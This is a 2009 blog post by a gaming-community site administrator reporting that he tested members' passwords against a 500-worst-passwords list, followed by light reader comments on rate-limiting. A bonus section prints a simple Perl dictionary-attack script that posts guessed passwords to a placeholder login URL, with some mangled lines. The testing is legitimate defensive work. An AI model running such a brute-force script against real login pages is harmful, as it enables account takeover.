You have officially passed the stupid password test!


I have been working on a couple security improvements for the site relating to login and authentication.  Primarily on a policy to handle failed logins and bot attacks.  Doing so necessitates the testing thereof, and I have thusly created a script to perform a dictionary attack.


A dictionary attack is very simple; a program tries repeatedly to log into an account using a list of words, often a dictionary as words are commonly used as passwords due to that they're easily remembered.


So what does this have to do with you, a loyal VG Press user?  Well, contrary to what you may think, I have no idea what your password is!  Every password is one-way encrypted before being sent to the server, then salted and hashed once more for good measure, so I can only see a garbled mess in the database.


So I set loose my script using a list of the 500 worst passwords that alledgedly encompasses the passwords of 1 in every 9 users.


But every active VG Press member has a password that is not on the list of the 500 worst.  Hoorah!



BONUS SECTION


For those interested in the code being the attack, it was written in Perl.  As to not needlessly give a program to do this to a live site, this isn't the exact program, but it's effectively the same.

 
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

$file = "dictionary.txt";
open FILE, $file or die $!;
print "Enter Username: ";
my $input = ;
$username = substr $input, 0, (length $input)-1;
while(my $line = )
{
  $word = substr $line, 0, (length $line)-1;
  do
    {
        $ua = LWP::UserAgent->new;
        $ua->timeout(3);
        my $req = (POST 'http://insecuresite.com/login',  
["username" => $username,
"password" => $word]);
        $response = $ua->request($req);
        $content = $response->content;
    }
    while($content == "500 read timeout");

    if(!(length $content > 0))
    {
        print "PASSWORD: $wordn";
        exit;
    }
}
close FILE;
print "No matches foundn";
exit;
Posted by Ellyoda Sat, 07 Mar 2009 05:06:40 (comments: 7)
 
Sat, 07 Mar 2009 05:20:45
So are you implimenting a "Too many failed logins!" functionality into the site, or what do you plan on doing to counteract dictionary/script attacks like these and others?
 
Sat, 07 Mar 2009 05:39:44
The likely solution is going to be exponentially increasing minimum time period between log-in attempts based on IP address.
 
Sat, 07 Mar 2009 05:43:17
Damn, I was hoping that password would be number!
 
Sat, 07 Mar 2009 08:12:18

Fuckin' A man!

 
Sun, 08 Mar 2009 11:22:33
I made my password specifically because I thought you could see it Yo. Sad
 
Tue, 10 Mar 2009 01:01:26
Then it's a good thing I recently changed my password from "pussy" to something else. WinkWink
 
Tue, 10 Mar 2009 20:48:41
Those 500 worst passwords are pretty funny. LOL Thankfully, mines not even close to anything on that list. Happy
Log in or Register for free to comment
Recently Spotted:
*crickets*
Login @ The VG Press
Username:
Password:
Remember me?